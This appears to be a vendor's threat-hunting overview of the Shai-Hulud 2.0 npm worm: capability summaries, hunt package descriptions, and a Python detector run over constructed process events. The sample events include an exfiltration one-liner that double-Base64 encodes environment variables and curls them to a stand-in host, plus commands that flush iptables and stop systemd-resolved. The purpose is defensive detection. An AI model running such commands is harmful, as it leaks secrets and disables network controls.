Threat Overview - Shai-Hulud Worm 2.0
UPDATE 12/08/2025: Shai-Hulud 2.0 represents an escalation of capability over the original npm-based supply-chain attack, adding earlier and broader execution paths, significantly expanded propagation, and deeper compromise capabilities across developer, CI/CD, and cloud environments. For example, this version adds preinstall execution, allowing the malware to run earlier in the installation process and reach more systems. It also introduces new payload components, including Bun-runtime-based scripts, which broaden where and how the malware can execute. Researchers have observed that the campaign has grown dramatically in scale, compromising hundreds of npm packages and tens of thousands of GitHub repositories, aided by aggressive automated replication. Shai-Hulud 2.0 also adds advanced exfiltration and persistence mechanisms, such as malicious GitHub Actions workflows that steal secrets or register backdoored runners, and it extends beyond the developer ecosystem to actively target cloud credentials across AWS, GCP, and Azure. Overall, Shai-Hulud 2.0 transforms the original worm into a far more automated, multi-platform, cloud-aware, and large-scale supply-chain threat.
This hunt package identifies shell commands where environment variables or content are double Base64 encoded and sent via curl/wget, potentially indicating exfiltration of sensitive data.
This Hunt Package identifies scenarios where Node.js, Bun, or npm act as the parent process for sudo commands that stop/restart systemd-resolved, overwrite resolved.conf, or flush iptables. This may indicate JS/Bun-based exploit chains modifying DNS and disabling egress controls.
This Threat Hunt package identifies the use of curl or wget followed by the potential execution of the downloaded payload via a scripting interpreter, such as Bash, Python, Perl, or others.
This use case is meant to identify command-line parameters indicative of the deletion or manipulation of disk or file data. This can be done in an attempt to evade detection and destroy evidence of adversarial activity.
This package targets identification of malicious use of cipher.exe, a legitimate Windows tool designed for file encryption and secure data deletion. Because it is a legitimate and signed tool, its use might evade basic detection mechanisms that flag untrusted binaries, making it a favorite for "living off the land" (LOTL) techniques in post-exploitation activity.
This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically focusing on changes that grant executable rights. By correlating these events with user contexts and known file paths, the package aims to highlight potentially malicious activities, such as the preparation of a system for exploitation or the setup of persistence mechanisms by unauthorized users.
This threat hunt package identifies instances where PowerShell is being used to download files from external sources, a common technique used in malware delivery and lateral movement. The hunt examines various methods by which PowerShell can be leveraged for file downloads, including the use of cmdlets such as Invoke-WebRequest (iwr), Invoke-RestMethod (irm), and Start-BitsTransfer (sbt), as well as direct utilization of .NET classes like System.Net.WebClient and HttpClient. The package also checks for potentially suspicious use of aliases (curl, wget) and other common executables that invoke PowerShell scripts to download malicious payloads.
This hunt package aims to identify TruffleHog execution and associated secret-scanning behavior on endpoints, including suspicious file creation and repository access. The goal is to identify unauthorized credential discovery or secret exfiltration attempts in both developer and production environments.
This hunt detects unexpected DNS requests to api.github.com originating from developer endpoints. Such activity may indicate unauthorized secret scanning, repository modification, or credential exfiltration attempts. The hunt focuses on identifying abnormal API interactions that deviate from normal developer workflows, helping to detect potential misuse of tools like TruffleHog or other automated repository scanning utilities.
This hunt package identifies Node.js spawning the Bun runtime during npm lifecycle events. This behavior aligns with malicious supply-chain execution patterns seen in Shai-Hulud 2.0, where npm preinstall scripts trigger unauthorized execution of alternative runtimes.
This hunt package identifies the use of consecutive Base64 encoding operations (e.g., base64 | base64) which may indicate attempts to obfuscate or exfiltrate data.
This Hunt Package identifies Docker being used to start a privileged container that mounts the host filesystem (e.g., / or /etc) to gain local privilege escalation, a behavior seen in Shai-Hulud 2.0 and used by other cloud-focused threat actors.
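The following is an added example, not code from this page or from the HUNTER platform's hunt packages: simplified versions of three of the hunts described above (double Base64 encoding piped to curl/wget, a JS runtime as the parent of sudo tampering with systemd-resolved or iptables, and Node.js spawning Bun during an npm lifecycle event) run over constructed process events. The event shape, the domain, the file path and the use of npm's `npm_lifecycle_event` environment variable to identify the lifecycle stage are assumptions of the example.

```python
import re

# Constructed sample process events in the shape an EDR records them
# (parent image, image, selected env vars, command line). Sample values only.
EVENTS = [
    {"parent": "node", "image": "sh", "env": {},
     "cmdline": "sh -c 'env | base64 | base64 | curl -s -X POST --data @- https://exfil.example.invalid/p'"},
    {"parent": "node", "image": "sudo", "env": {},
     "cmdline": "sudo systemctl stop systemd-resolved"},
    {"parent": "node", "image": "sudo", "env": {},
     "cmdline": "sudo iptables -F"},
    {"parent": "node", "image": "bun", "env": {"npm_lifecycle_event": "preinstall"},
     "cmdline": "bun /tmp/constructed_payload.js"},
    {"parent": "bash", "image": "base64", "env": {},
     "cmdline": "base64 -d archive.b64"},          # single decode: benign
    {"parent": "npm", "image": "node", "env": {"npm_lifecycle_event": "test"},
     "cmdline": "node ./node_modules/.bin/jest"},   # normal lifecycle use: benign
]

JS_RUNTIMES = {"node", "bun", "npm"}
# Two base64 encode stages (neither with -d/--decode) followed later by curl or wget.
DOUBLE_B64_TO_NET = re.compile(
    r"\bbase64\b(?!\s+-d)(?!\s+--decode).*\|\s*base64\b(?!\s+-d)(?!\s+--decode).*\b(curl|wget)\b")
# Stopping/restarting systemd-resolved, touching resolved.conf, or flushing iptables.
NET_TAMPER = re.compile(
    r"systemctl\s+(stop|restart)\s+systemd-resolved|resolved\.conf|iptables\s+(-F|--flush)")


def classify(event):
    """Return the names of the hunts this single event matches (empty if benign)."""
    hits = []
    cmd = event["cmdline"]
    if DOUBLE_B64_TO_NET.search(cmd):
        hits.append("double_base64_exfil")
    if event["parent"] in JS_RUNTIMES and event["image"] == "sudo" and NET_TAMPER.search(cmd):
        hits.append("js_runtime_sudo_network_tamper")
    # npm exports npm_lifecycle_event (e.g. "preinstall") to scripts it runs.
    if event["parent"] == "node" and event["image"] == "bun" and event["env"].get("npm_lifecycle_event"):
        hits.append("node_spawns_bun_in_npm_lifecycle")
    return hits


def hunt(events):
    """Map each matching command line to the hunts it triggered."""
    return {e["cmdline"]: classify(e) for e in events if classify(e)}


if __name__ == "__main__":
    for cmd, names in hunt(EVENTS).items():
        print(", ".join(names), "<-", cmd)
```

The rules here deliberately require the parent-process and lifecycle context described in the package summaries, which is what keeps ordinary developer use of base64, sudo and Bun out of the results.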